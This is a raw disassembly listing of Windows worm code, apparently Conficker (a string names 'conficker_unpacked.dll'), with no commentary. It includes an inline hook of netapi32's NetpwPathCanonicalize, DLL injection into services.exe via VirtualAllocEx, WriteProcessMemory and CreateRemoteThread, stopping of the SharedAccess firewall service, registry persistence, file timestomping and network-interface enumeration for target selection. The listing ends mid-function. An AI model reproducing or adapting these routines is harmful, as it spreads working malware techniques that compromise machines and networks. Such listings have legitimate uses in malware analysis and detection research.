call sub_9A74B7
test eax, eax
pop ecx
pop ecx
jnz short loc_9A795B
mov [ebp+arg_0], 3
loc_9A795B: ; CODE XREF: sub_9A78CC+72�j
; sub_9A78CC+86�j
push edi
push [ebp+arg_0]
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_9A7607
lea eax, [ebp+var_80]
push eax
push offset aSIpc ; "\\\\%s\\IPC$"
lea eax, [ebp+var_180]
push 100h
push eax
call esi ; dword_9A11D4
add esp, 24h
push 1
push 0
lea eax, [ebp+var_180]
push eax
call sub_9B34E4
loc_9A7995: ; CODE XREF: sub_9A78CC+52�j
; sub_9A78CC+62�j
pop edi
pop esi
pop ebx
leave
retn
sub_9A78CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A799A proc near ; CODE XREF: sub_9A7B0B+47�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 20h
push offset stru_9A1598
call __SEH_prolog
mov esi, ecx
mov edi, edx
xor ebx, ebx
mov [ebp+var_28], ebx
mov [ebp+ms_exc.disabled], ebx
push 2Ch
push ebx
push esi
call sub_9B3240 ; memset
add esp, 0Ch
mov eax, [ebp+arg_0]
mov [esi+28h], eax
mov [esi+24h], edi
mov [ebp+var_1C], edi
mov [ebp+var_2C], ebx
mov [ebp+var_30], 5
loc_9A79D4: ; CODE XREF: sub_9A799A+8C�j
cmp ebx, 5
jge short loc_9A7A30
mov eax, [ebp+var_1C]
add eax, ebx
push eax
call sub_9B3080
pop ecx
mov [ebp+var_20], eax
mov eax, [ebp+var_1C]
add eax, ebx
mov cl, [eax]
mov dl, cl
and dl, 0FEh
cmp dl, 0E8h
jz short loc_9A7A28
cmp cl, 0FFh
jnz short loc_9A7A0B
mov cl, [eax+1]
cmp cl, 25h
jz short loc_9A7A28
cmp cl, 15h
jz short loc_9A7A28
loc_9A7A0B: ; CODE XREF: sub_9A799A+62�j
push [ebp+var_20]
push eax
lea eax, [ebx+esi+4]
push eax
call sub_9B323A ; memcpy
add esp, 0Ch
mov eax, [ebp+var_20]
add ebx, eax
mov [esi], ebx
mov [ebp+var_2C], ebx
jmp short loc_9A79D4
; ---------------------------------------------------------------------------
loc_9A7A28: ; CODE XREF: sub_9A799A+5D�j
; sub_9A799A+6A�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor eax, eax
jmp short loc_9A7A8A
; ---------------------------------------------------------------------------
loc_9A7A30: ; CODE XREF: sub_9A799A+3D�j
lea eax, [ebx+esi]
mov byte ptr [eax+4], 0E9h
mov ecx, [esi]
sub ecx, ebx
sub ecx, esi
lea ecx, [ecx+edi-9]
mov [eax+5], ecx
lea eax, [ebp+var_24]
push eax
push 40h
push dword ptr [esi]
push edi
mov ebx, dword_9A1104
call ebx ; dword_9A1104
test eax, eax
jz short loc_9A7A83
mov byte ptr [edi], 0E9h
mov eax, [ebp+arg_0]
sub eax, edi
sub eax, 5
mov [edi+1], eax
lea eax, [ebp+var_24]
push eax
push [ebp+var_24]
push dword ptr [esi]
push edi
call ebx ; dword_9A1104
mov [ebp+var_28], 1
jmp short loc_9A7A83
; ---------------------------------------------------------------------------
loc_9A7A7C: ; DATA XREF: .text:stru_9A1598�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A7A80: ; DATA XREF: .text:stru_9A1598�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A7A83: ; CODE XREF: sub_9A799A+BD�j
; sub_9A799A+E0�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_28]
loc_9A7A8A: ; CODE XREF: sub_9A799A+94�j
call __SEH_epilog
retn
sub_9A799A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7A90 proc near ; DATA XREF: sub_9A7B0B+3E�o
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push 8
push offset stru_9A15B0
call __SEH_prolog
xor eax, eax
cmp dword_9B55FC, eax
jz short loc_9A7AD7
mov [ebp+ms_exc.disabled], eax
cmp [ebp+arg_0], eax
jz short loc_9A7AE9
push offset a__ ; "\\..\\"
push [ebp+arg_0]
call dword_9A11AC ; wcsstr
pop ecx
pop ecx
test eax, eax
jnz short loc_9A7AD3
push [ebp+arg_0]
call dword_9A11B0 ; wcslen
pop ecx
cmp eax, 0C8h
jbe short loc_9A7AE9
loc_9A7AD3: ; CODE XREF: sub_9A7A90+30�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_9A7AD7: ; CODE XREF: sub_9A7A90+14�j
push 57h
pop eax
loc_9A7ADA: ; CODE XREF: sub_9A7A90+79�j
call __SEH_epilog
retn 18h
; ---------------------------------------------------------------------------
loc_9A7AE2: ; DATA XREF: .text:stru_9A15B0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A7AE6: ; DATA XREF: .text:stru_9A15B0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A7AE9: ; CODE XREF: sub_9A7A90+1C�j
; sub_9A7A90+41�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
mov eax, dword_9B55FC
add eax, 4
call eax ; dword_9B5600
jmp short loc_9A7ADA
sub_9A7A90 endp
; =============== S U B R O U T I N E =======================================
sub_9A7B0B proc near ; CODE XREF: sub_9A6A3A+B4�p
push esi
push offset aNetapi32_dll ; "netapi32.dll"
xor esi, esi
call dword_9A1114 ; LoadLibraryA
test eax, eax
jz short loc_9A7B71
push edi
push offset aNetpwpathcanon ; "NetpwPathCanonicalize"
push eax
call dword_9A1110 ; GetProcAddress
mov edi, eax
test edi, edi
jz short loc_9A7B70
push 40h
push 103000h
push 2Ch
push esi
call dword_9A110C ; VirtualAlloc
test eax, eax
mov dword_9B55FC, eax
jz short loc_9A7B70
push offset sub_9A7A90
mov ecx, eax
mov edx, edi
call sub_9A799A
mov esi, eax
test esi, esi
pop ecx
jnz short loc_9A7B70
push 8000h
push eax
push dword_9B55FC
call dword_9A1108 ; VirtualFree
loc_9A7B70: ; CODE XREF: sub_9A7B0B+23�j
; sub_9A7B0B+3C�j ...
pop edi
loc_9A7B71: ; CODE XREF: sub_9A7B0B+10�j
mov eax, esi
pop esi
retn
sub_9A7B0B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7B75 proc near ; CODE XREF: sub_9A7CA0+2B�p
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
push [ebp+arg_4]
xor ebx, ebx
mov [ebp+var_8], ebx
call sub_9B322E ; strlen
pop ecx
push [ebp+arg_0]
mov esi, eax
push ebx
push 2Ah
call dword_9A10B4 ; OpenProcess
mov edi, eax
cmp edi, ebx
jz short loc_9A7C18
push 40h
push 3000h
lea eax, [esi+20h]
push eax
push ebx
push edi
call dword_9A10B8 ; VirtualAllocEx
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_9A7C11
push offset aLoadlibrarya ; "LoadLibraryA"
push offset aKernel32_dll ; "kernel32.dll"
call dword_9A1120 ; GetModuleHandleA
push eax
call dword_9A1110 ; GetProcAddress
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push eax
inc esi
push esi
push [ebp+arg_4]
push [ebp+var_4]
push edi
call dword_9A111C ; WriteProcessMemory
test eax, eax
jz short loc_9A7C11
lea eax, [ebp+var_C]
push eax
push ebx
push [ebp+var_4]
push [ebp+var_C]
push ebx
push ebx
push edi
call dword_9A1118 ; CreateRemoteThread
cmp eax, ebx
jz short loc_9A7C11
push eax
mov [ebp+var_8], 1
call dword_9A10E8 ; CloseHandle
loc_9A7C11: ; CODE XREF: sub_9A7B75+43�j
; sub_9A7B75+74�j ...
push edi
call dword_9A10E8 ; CloseHandle
loc_9A7C18: ; CODE XREF: sub_9A7B75+29�j
mov eax, [ebp+var_8]
pop edi
pop esi
pop ebx
leave
retn
sub_9A7B75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7C20 proc near ; CODE XREF: sub_9A7CA0+8�p
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
push esi
xor ebx, ebx
push ebx
push 2
call sub_9B34A8 ; CreateToolhelp32Snapshot
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_9A7C9A
push edi
push 49h
pop ecx
xor eax, eax
mov [ebp+var_128], 128h
lea edi, [ebp+var_124]
rep stosd
lea eax, [ebp+var_128]
push eax
push esi
call sub_9B34A2 ; Process32First
pop edi
jmp short loc_9A7C87
; ---------------------------------------------------------------------------
loc_9A7C64: ; CODE XREF: sub_9A7C20+69�j
push [ebp+arg_0]
lea eax, [ebp+var_104]
push eax
call dword_9A115C ; _stricmp
test eax, eax
pop ecx
pop ecx
jz short loc_9A7C8D
lea eax, [ebp+var_128]
push eax
push esi
call sub_9B349C ; Process32Next
loc_9A7C87: ; CODE XREF: sub_9A7C20+42�j
test eax, eax
jnz short loc_9A7C64
jmp short loc_9A7C93
; ---------------------------------------------------------------------------
loc_9A7C8D: ; CODE XREF: sub_9A7C20+58�j
mov ebx, [ebp+var_120]
loc_9A7C93: ; CODE XREF: sub_9A7C20+6B�j
push esi
call dword_9A10E8 ; CloseHandle
loc_9A7C9A: ; CODE XREF: sub_9A7C20+1A�j
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_9A7C20 endp
; =============== S U B R O U T I N E =======================================
sub_9A7CA0 proc near ; CODE XREF: sub_9A6847+1D�p
push esi
xor esi, esi
loc_9A7CA3: ; CODE XREF: sub_9A7CA0+21�j
push offset aServices_exe ; "services.exe"
call sub_9A7C20
test eax, eax
pop ecx
jnz short loc_9A7CC5
push 3E8h
call dword_9A10C4 ; Sleep
inc esi
cmp esi, 14h
jl short loc_9A7CA3
pop esi
retn
; ---------------------------------------------------------------------------
loc_9A7CC5: ; CODE XREF: sub_9A7CA0+10�j
push offset aCWindowsSystem ; "c:\\windows\\system32\\conficker_unpacked.dll"...
push eax
call sub_9A7B75
pop ecx
pop ecx
pop esi
retn
sub_9A7CA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7CD4 proc near ; CODE XREF: sub_9ABD83+316�p
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
push esi
lea eax, [ebp+var_4]
push eax
push 20006h
xor esi, esi
push esi
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call dword_9A1028 ; RegOpenKeyExA
test eax, eax
jnz short loc_9A7D20
push 4
lea eax, [ebp+arg_0]
push eax
push 4
push esi
push offset word_9A1642
push [ebp+var_4]
call dword_9A102C ; RegSetValueExA
push [ebp+var_4]
mov esi, eax
neg esi
sbb esi, esi
inc esi
call dword_9A101C ; RegCloseKey
loc_9A7D20: ; CODE XREF: sub_9A7CD4+23�j
mov eax, esi
pop esi
leave
retn
sub_9A7CD4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7D25 proc near ; CODE XREF: sub_9A6A3A+3D�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
lea eax, [ebp+var_4]
push eax
push 20019h
xor esi, esi
push esi
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call dword_9A1028 ; RegOpenKeyExA
test eax, eax
jnz short loc_9A7D7F
push 4
pop eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
push esi
push offset word_9A1642
push [ebp+var_4]
call dword_9A1024 ; RegQueryValueExA
push [ebp+var_4]
mov esi, eax
neg esi
sbb esi, esi
inc esi
call dword_9A101C ; RegCloseKey
loc_9A7D7F: ; CODE XREF: sub_9A7D25+25�j
mov eax, esi
pop esi
leave
retn
sub_9A7D25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7D84 proc near ; CODE XREF: sub_9A6DB9:loc_9A6E07�p
; sub_9AC0EF+24�p ...
var_108 = byte ptr -108h
var_105 = byte ptr -105h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 108h
push 104h
lea eax, [ebp+var_108]
push eax
mov [ebp+var_4], 12345678h
call dword_9A10E0 ; GetSystemDirectoryA
xor eax, eax
push eax
push eax
push eax
push eax
lea ecx, [ebp+var_4]
push ecx
push eax
push eax
mov [ebp+var_105], al
lea eax, [ebp+var_108]
push eax
call dword_9A10A4 ; GetVolumeInformationA
mov eax, [ebp+var_4]
leave
retn
sub_9A7D84 endp
; =============== S U B R O U T I N E =======================================
sub_9A7DCA proc near ; CODE XREF: sub_9A85F4+8B�p
; sub_9A88D6+9�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
xor eax, eax
mov edx, ecx
and edx, 0FFFFh
inc eax
cmp edx, 0A8C0h
jz short loc_9A7DF4
cmp cl, 0Ah
jz short loc_9A7DF4
and ecx, 0F0FFh
cmp ecx, 10ACh
jnz short locret_9A7DF6
loc_9A7DF4: ; CODE XREF: sub_9A7DCA+15�j
; sub_9A7DCA+1A�j
xor eax, eax
locret_9A7DF6: ; CODE XREF: sub_9A7DCA+28�j
retn
sub_9A7DCA endp
; =============== S U B R O U T I N E =======================================
sub_9A7DF7 proc near ; CODE XREF: sub_9A7E5C+A4�p
; sub_9A85F4+7E�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov ecx, esi
and ecx, 0FFh
xor eax, eax
cmp ecx, 7Fh
jz short loc_9A7E5A
test ecx, ecx
jz short loc_9A7E5A
mov ecx, esi
and ecx, 0FFFFh
cmp ecx, 0FEA9h
jz short loc_9A7E5A
mov ecx, esi
and ecx, 0FEFFh
cmp ecx, 12C6h
jz short loc_9A7E5A
mov ecx, esi
and ecx, 0FFFFFFh
cmp ecx, 0FFFFFDh
jz short loc_9A7E5A
mov ecx, esi
mov edx, 0F0h
and ecx, edx
cmp ecx, 0E0h
jz short loc_9A7E5A
cmp ecx, edx
jz short loc_9A7E5A
cmp esi, 0FFFFFFFFh
jz short loc_9A7E5A
inc eax
loc_9A7E5A: ; CODE XREF: sub_9A7DF7+12�j
; sub_9A7DF7+16�j ...
pop esi
retn
sub_9A7DF7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7E5C proc near ; CODE XREF: sub_9A8A08+56�p
; sub_9A8A08+3A0�p
var_4C14 = byte ptr -4C14h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 4C14h
call __alloca_probe
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
lea eax, [edi+edi*2]
shl eax, 2
push eax
xor ebx, ebx
push ebx
push esi
mov [ebp+var_4], ebx
call sub_9B3240 ; memset
add esp, 0Ch
push ebx
push 1
push 2
call dword_9A12AC ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_14], eax
jz loc_9A7F49
push ebx
push ebx
lea ecx, [ebp+var_C]
push ecx
push 4C00h
lea ecx, [ebp+var_4C14]
push ecx
push ebx
push ebx
push 4004747Fh
push eax
call dword_9A12A8 ; WSAIoctl
test eax, eax
jnz short loc_9A7F40
mov eax, [ebp+var_C]
push 4Ch
xor edx, edx
pop ecx
div ecx
mov [ebp+var_8], ebx
cmp eax, ebx
mov [ebp+var_C], eax
jbe short loc_9A7F40
lea ebx, [ebp+var_4C14]
add esi, 8
jmp short loc_9A7EE5
; ---------------------------------------------------------------------------
loc_9A7EE2: ; CODE XREF: sub_9A7E5C+E2�j
mov edi, [ebp+arg_4]
loc_9A7EE5: ; CODE XREF: sub_9A7E5C+84�j
cmp [ebp+var_4], edi
jnb short loc_9A7F40
mov eax, [ebx+8]
mov edi, [ebx+38h]
and edi, eax
mov [ebp+var_10], eax
mov eax, [ebx]
test al, 1
jz short loc_9A7F32
test al, 4
jnz short loc_9A7F32
push edi
call sub_9A7DF7
test eax, eax
pop ecx
jz short loc_9A7F32
cmp [ebp+var_10], 0
jz short loc_9A7F32
cmp [ebp+var_10], 0FFFFFFFFh
jz short loc_9A7F32
push dword ptr [ebx+38h]
call dword_9A12A4 ; ntohl
mov ecx, [ebp+var_10]
inc [ebp+var_4]
not eax
mov [esi-8], ecx
mov [esi-4], edi
mov [esi], eax
add esi, 0Ch
loc_9A7F32: ; CODE XREF: sub_9A7E5C+9D�j
; sub_9A7E5C+A1�j ...
inc [ebp+var_8]
mov eax, [ebp+var_8]
add ebx, 4Ch
cmp eax, [ebp+var_C]
jb short loc_9A7EE2
loc_9A7F40: ; CODE XREF: sub_9A7E5C+65�j
; sub_9A7E5C+79�j ...
push [ebp+var_14]
call dword_9A1284 ; closesocket
loc_9A7F49: ; CODE XREF: sub_9A7E5C+3D�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_9A7E5C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7F51 proc near ; CODE XREF: sub_9A6847+C�p
; sub_9A85F4+7�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
call dword_9A1094 ; GetCurrentThreadId
mov esi, eax
call dword_9A1098 ; GetCurrentProcessId
mov edi, eax
lea eax, [ebp+var_8]
push eax
call dword_9A109C ; QueryPerformanceCounter
test eax, eax
jnz short loc_9A7F80
and [ebp+var_4], eax
mov [ebp+var_8], 4362AEB0h
loc_9A7F80: ; CODE XREF: sub_9A7F51+23�j
call dword_9A10A0 ; GetTickCount
xor eax, [ebp+var_8]
xor eax, edi
xor eax, esi
push eax
call dword_9A11A8 ; srand
pop ecx
pop edi
pop esi
leave
retn
sub_9A7F51 endp
; =============== S U B R O U T I N E =======================================
sub_9A7F99 proc near ; CODE XREF: sub_9AC0EF+5F�p
var_18 = byte ptr -18h
sub esp, 1Ch
push ebp
push edi
push 0F003Fh
xor ebp, ebp
push ebp
push ebp
call dword_9A1014 ; OpenSCManagerA
mov edi, eax
cmp edi, ebp
jz short loc_9A7FEA
push ebx
push esi
push 20020h
push offset aSharedaccess ; "SharedAccess"
push edi
call dword_9A1018 ; OpenServiceA
mov ebx, dword_9A1000
mov esi, eax
cmp esi, ebp
jz short loc_9A7FE5
lea eax, [esp+28h+var_18]
push eax
push 1
push esi
call dword_9A1020 ; ControlService
push esi
mov ebp, eax
call ebx ; dword_9A1000
loc_9A7FE5: ; CODE XREF: sub_9A7F99+37�j
push edi
call ebx ; dword_9A1000
pop esi
pop ebx
loc_9A7FEA: ; CODE XREF: sub_9A7F99+18�j
pop edi
mov eax, ebp
pop ebp
add esp, 1Ch
retn
sub_9A7F99 endp
; =============== S U B R O U T I N E =======================================
sub_9A7FF2 proc near ; CODE XREF: sub_9A6847+5B�p
; sub_9ABD83+2C1�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_9A801A
loc_9A8003: ; CODE XREF: sub_9A7FF2+26�j
call dword_9A11D8 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_9A8003
loc_9A801A: ; CODE XREF: sub_9A7FF2+F�j
mov byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_9A7FF2 endp
; =============== S U B R O U T I N E =======================================
sub_9A8022 proc near ; CODE XREF: sub_9A927B+47�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_9A804B
loc_9A8033: ; CODE XREF: sub_9A8022+27�j
call dword_9A11D8 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add edx, 61h
mov [ebx+esi*2], dx
inc esi
cmp esi, edi
jl short loc_9A8033
loc_9A804B: ; CODE XREF: sub_9A8022+F�j
and word ptr [ebx+edi*2], 0
pop edi
pop esi
pop ebx
retn
sub_9A8022 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8054 proc near ; CODE XREF: sub_9A6847+CD�p
; sub_9A81A0+5F�p ...
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
push edi
push 104h
lea eax, [ebp+var_11C]
push eax
push offset aKernel32_dll ; "kernel32.dll"
call dword_9A1120 ; GetModuleHandleA
push eax
call dword_9A10FC ; GetModuleFileNameA
mov esi, dword_9A10D0
xor ebx, ebx
push ebx
push ebx
push 3
push ebx
push 1
push 80000000h
lea eax, [ebp+var_11C]
push eax
call esi ; dword_9A10D0
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_9A80EC
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push edi
call dword_9A108C ; GetFileTime
push edi
mov edi, dword_9A10E8
call edi ; dword_9A10E8
push ebx
push ebx
push 3
push ebx
push 3
push 0C0000000h
push [ebp+arg_0]
call esi ; dword_9A10D0
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_9A80EC
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call dword_9A1090 ; SetFileTime
push esi
call edi ; dword_9A10E8
loc_9A80EC: ; CODE XREF: sub_9A8054+4C�j
; sub_9A8054+80�j
pop edi
pop esi
pop ebx
leave
retn
sub_9A8054 endp
; =============== S U B R O U T I N E =======================================
sub_9A80F1 proc near ; CODE XREF: sub_9A7607+96�p
arg_0 = dword ptr 4
push [esp+arg_0]
push 9
call dword_9A1084 ; GetProcessHeap
push eax
call dword_9A1088 ; RtlAllocateHeap
retn
sub_9A80F1 endp
; =============== S U B R O U T I N E =======================================
sub_9A8105 proc near ; CODE XREF: sub_9A7607+271�p
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
call dword_9A1084 ; GetProcessHeap
push eax
call dword_9A1080 ; RtlFreeHeap
retn
sub_9A8105 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8119 proc near ; CODE XREF: sub_9A6847+FD�p
; sub_9AC693+91�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
xor edi, edi
push edi
push edi
push 3
push edi
push 1
push 80000000h
push [ebp+arg_4]
mov [ebp+var_C], edi
call dword_9A10D0 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jz short loc_9A819A
push ebx
push esi
push edi
push eax
call dword_9A10CC ; GetFileSize
mov esi, eax
push esi
push 40h
call dword_9A10C0 ; GlobalAlloc
mov ebx, eax
cmp ebx, edi
jz short loc_9A818F
push edi
lea eax, [ebp+var_4]
push eax
push esi
push ebx
push [ebp+var_8]
mov [ebp+var_4], edi
call dword_9A107C ; ReadFile
test eax, eax
jz short loc_9A8188
cmp [ebp+var_4], esi
jnz short loc_9A8188
cmp [ebp+var_4], edi
jz short loc_9A8188
mov eax, [ebp+arg_0]
mov [ebp+var_C], ebx
mov [eax], esi
jmp short loc_9A818F
; ---------------------------------------------------------------------------
loc_9A8188: ; CODE XREF: sub_9A8119+59�j
; sub_9A8119+5E�j ...
push ebx
call dword_9A10BC ; GlobalFree
loc_9A818F: ; CODE XREF: sub_9A8119+42�j
; sub_9A8119+6D�j
push [ebp+var_8]
call dword_9A10E8 ; CloseHandle
pop esi
pop ebx
loc_9A819A: ; CODE XREF: sub_9A8119+27�j
mov eax, [ebp+var_C]
pop edi
leave
retn
sub_9A8119 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A81A0 proc near ; CODE XREF: sub_9AC843+174�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
xor esi, esi
push esi
push esi
push 2
push esi
push 1
push 40000000h
push [ebp+arg_8]
mov [ebp+var_4], esi
call dword_9A10D0 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_9A820D
push ebx
mov ebx, [ebp+arg_4]
push esi
lea eax, [ebp+var_8]
push eax
push ebx
push [ebp+arg_0]
mov [ebp+var_8], esi
push edi
call dword_9A1034 ; WriteFile
test eax, eax
jz short loc_9A81EF
cmp [ebp+var_8], ebx
jnz short loc_9A81EF
mov [ebp+var_4], 1
loc_9A81EF: ; CODE XREF: sub_9A81A0+41�j
; sub_9A81A0+46�j
push edi
call dword_9A10E8 ; CloseHandle
cmp [ebp+var_4], esi
pop ebx
push [ebp+arg_8]
jz short loc_9A8207
call sub_9A8054
pop ecx
jmp short loc_9A820D
; ---------------------------------------------------------------------------
loc_9A8207: ; CODE XREF: sub_9A81A0+5D�j
call dword_9A1078 ; DeleteFileA
loc_9A820D: ; CODE XREF: sub_9A81A0+26�j
; sub_9A81A0+65�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_9A81A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8214 proc near ; CODE XREF: sub_9ABADB+7B�p
; sub_9ABADB+C4�p ...
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 210h
mov ecx, [ebp+arg_8]
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, [ebp+arg_0]
mov [ebp+var_8], ecx
lea ecx, [ebp+var_8]
push ecx
xor eax, eax
lea ecx, [ebp+var_10C]
push ecx
push eax
lea ecx, [ebp+var_210]
xor ebx, ebx
push ecx
inc ebx
push eax
mov [esi], eax
mov [ebp+var_20C], edi
mov [ebp+var_210], ebx
mov [ebp+var_108], edi
mov [ebp+var_10C], ebx
mov [ebp+var_4], eax
call dword_9A124C ; select
cmp eax, ebx
mov [ebp+arg_4], eax
jl short loc_9A82CF
lea eax, [ebp+var_10C]
push eax
push edi
call sub_9B34C0 ; __WSAFDIsSet
test eax, eax
jnz short loc_9A82CF
lea eax, [ebp+arg_4]
push eax
push 4004667Fh
push edi
call dword_9A1254 ; ioctlsocket
cmp eax, 0FFFFFFFFh
jz short loc_9A82DA
push [ebp+arg_4]
push 40h
call dword_9A10C0 ; GlobalAlloc
mov ebx, eax
test ebx, ebx
jz short loc_9A82CB
push 0
push [ebp+arg_4]
push ebx
push edi
call dword_9A1258 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_9A82BD
and dword ptr [esi], 0
loc_9A82BD: ; CODE XREF: sub_9A8214+A4�j
cmp dword ptr [esi], 0
jnz short loc_9A82CB
push ebx
call dword_9A10BC ; GlobalFree
xor ebx, ebx
loc_9A82CB: ; CODE XREF: sub_9A8214+90�j
; sub_9A8214+AC�j
mov eax, ebx
jmp short loc_9A82DC
; ---------------------------------------------------------------------------
loc_9A82CF: ; CODE XREF: sub_9A8214+59�j
; sub_9A8214+6A�j
push 274Ch
call dword_9A12A0 ; WSASetLastError
loc_9A82DA: ; CODE XREF: sub_9A8214+7F�j
xor eax, eax
loc_9A82DC: ; CODE XREF: sub_9A8214+B9�j
pop edi
pop esi
pop ebx
leave
retn
sub_9A8214 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A82E1 proc near ; CODE XREF: sub_9ABADB+63�p
; sub_9ABADB+AD�p ...
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
xor edi, edi
cmp [ebp+arg_8], edi
jle short loc_9A836C
mov esi, [ebp+arg_0]
xor ebx, ebx
inc ebx
loc_9A82FA: ; CODE XREF: sub_9A82E1+89�j
mov eax, [ebp+arg_C]
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_10C]
push ecx
lea ecx, [ebp+var_210]
mov [ebp+var_8], eax
xor eax, eax
push ecx
push eax
push eax
mov [ebp+var_20C], esi
